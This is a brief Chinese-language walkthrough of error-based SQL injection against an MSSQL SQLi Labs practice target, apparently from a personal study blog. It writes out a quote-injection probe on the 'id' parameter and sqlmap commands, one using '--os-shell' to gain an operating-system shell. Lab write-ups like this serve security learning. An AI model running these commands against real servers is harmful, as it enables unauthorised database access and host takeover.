SQL server基于报错的注入

1.访问MSSQL SQLi Labs网站

image-20240721204440045

点击按钮,我们使用GET请求上传参数“id”,当id=1时,页面显示id=1的用户名Dump、密码Dump:

image-20240721204631637

2.寻找注入点

http://[靶机IP]/less-1.asp?id=1'

运行后报错,说明我们可以利用参数“id”作为我们的注入点,根据回显我们可以判断这是字符型注入点:

image-20240721205059648

直接上SQLmap吧:

python sqlmap.py -u http://localhost:800/less-1.asp?id=1

image-20240721205446190

可以发现id可以作为注入点,我们直接getshell:

python sqlmap.py -u http://localhost:800/less-1.asp?id=1 --os-shell

image-20240721205656211

获得了shell

image-20240721205917279

后面的关卡也这么做吧。